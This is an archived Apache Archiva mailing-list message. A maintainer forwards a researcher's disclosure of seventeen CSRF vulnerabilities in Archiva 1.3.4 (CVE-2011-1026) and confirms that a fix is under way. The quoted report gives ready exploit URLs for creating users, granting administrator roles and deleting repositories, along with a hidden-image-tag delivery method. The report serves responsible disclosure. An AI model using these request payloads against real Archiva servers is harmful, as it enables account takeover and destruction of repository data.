archiva-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Deng Ching <och...@apache.org>
Subject Fwd: FW: Multiple CSRF issues in Archiva 1.3.4
Date Tue, 01 Mar 2011 03:28:10 GMT
Please be aware of the security vulnerabilities below that was
reported in the dev list. We're already working on the fix and will
release the fix as soon as possible.

Thanks,
Deng


---------- Forwarded message ----------
From: Deng Ching <oching@apache.org>
Date: Tue, Mar 1, 2011 at 11:25 AM
Subject: Re: FW: Multiple CSRF issues in Archiva 1.3.4
To: dev@archiva.apache.org
Cc: Walikar Riyaz Ahemed Dawalmalik <WalikarRiyazAD@microland.com>


Thanks for reporting this, however, it should have been sent/reported
to security@ first. I've forwarded this to the correct list and the
CVE-ID is CVE-2011-1026. The CSRF issues aren't considered absolutely
critical but we're already working on the fix and will schedule
another release as soon as possible.

-Deng

On Mon, Feb 28, 2011 at 3:31 PM, Walikar Riyaz Ahemed  Dawalmalik
<WalikarRiyazAD@microland.com> wrote:
> Hi,
>
> The latest version of Archiva (1.3.4) is also vulnerable to multiple
> CSRF issues. The following are the details and exploit code. Please
> confirm this mail and revert with an update. I will be disclosing this
> to the security community after the issues have been fixed.
>
> Project: Archiva
> Severity: Critical
> Versions: 1.3.4 (other versions may be affected)
> Exploit type: Multiple CSRF
>
> CSRF:
>
> An attacker can build a simple html page containing a hidden Image tag
> (eg: <img src=vulnurl width=0 height=0 />) and entice the administrator
> to access the page resulting in the following issues:
>
> 1. An attacker can create a new user using the administrator's session:
> http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.use
> rname=tester123&user.fullName=test&user.email=test%40test.com&user.passw
> ord=abc&user.confirmPassword=abc
>
> 2. An attacker can delete a user:
> http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username
> =test
>
> 3. An attacker can elevate privileges of accounts:
> http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=t
> est&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_a
> ddNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrato
> r&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSel
> ectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repos
> itory+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&s
> ubmitRolesButton=Submit
>
> 4. An attacker can delete the Configuration and contents along with the
> repository:
> http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&
> method%3AdeleteContents=Delete+Configuration+and+Contents
>
> 5. An attacker can delete an artifact from any repository:
> http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&a
> rtifactId=1&version=1&repositoryId=snapshots
>
> 6. An attacker can add a Repository Group:
> http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repository
> Group.id=csrfgrp
>
> 7. An attacker can delete a repository Group:
> http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGro
> upId=test&method%3Adelete=Confirm
>
> 8. An attacker can disable Proxy connectors:
> http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action
> ?target=maven2-repository.dev.java.net&source=internal
>
> 9. An attacker can Delete proxy connectors:
> http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?t
> arget=maven2-repository.dev.java.net&source=snapshots
>
> 10. An attacker can delete Legacy Artifact Path under Legacy Support:
> http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path
> =jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar
>
> 11. An attacker can create a New Network Proxy configuration:
> http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&pro
> xy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.us
> ername=&proxy.password=
>
> 12. An attacker can delete an existing network proxy configuration:
> http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?pro
> xyid=myproxy
>
> 13. An attacker can add custom file extensions to the repository
> scanning page:
> http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePatter
> n.action?pattern=**%2F*.rum&fileTypeId=artifacts
>
> 14. An attacker can remove an existing file extension from the
> repository scanning page:
> http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePat
> tern.action?pattern=**%2F*.rum&fileTypeId=artifacts
>
> 15. An attacker can change the settings on the Known Consumers section:
> http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsum
> ers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentC
> onsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksu
> ms&enabledKnownContentConsumers=index-content&enabledKnownContentConsume
> rs=metadata-updater&enabledKnownContentConsumers=repository-purge&enable
> dKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=v
> alidate-checksums
>
> 16. An attacker can enable/disable Unprocessed Consumer settings:
> http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.
> action?enabledUnprocessedConsumers=update-db-project
>
> 17. An attacker can change settings on the Cleanup Consumers section:
> http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.acti
> on?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanup
> Consumers=not-present-remove-db-project&enabledCleanupConsumers=not-pres
> ent-remove-indexed
>
>
> I would request you to provide CVE-IDs for the vulnerabilities so that I
> can co-ordinate a full disclosure after these issues are fixed.
>
> Warm Regards,
> Riyaz Ahemed Walikar || Senior Engineer - Professional Services
> Vulnerability Assessment & Penetration Testing
> Mobile: +91-98860-42242 || Extn: 5601
>
>
> The information transmitted is intended only for the person or entity to which it is
addressed and may contain confidential and/or privileged material.
> Any review, re-transmission, dissemination or other use of or taking of any action in
reliance upon,this information by persons or entities other than the intended recipient is
prohibited.
> If you received this in error, please contact the sender and delete the material from
your computer.
> Microland takes all reasonable steps to ensure that its electronic communications are
free from viruses.
> However, given Internet accessibility, the Company cannot accept liability for any virus
introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking
software.
>
>

Mime
View raw message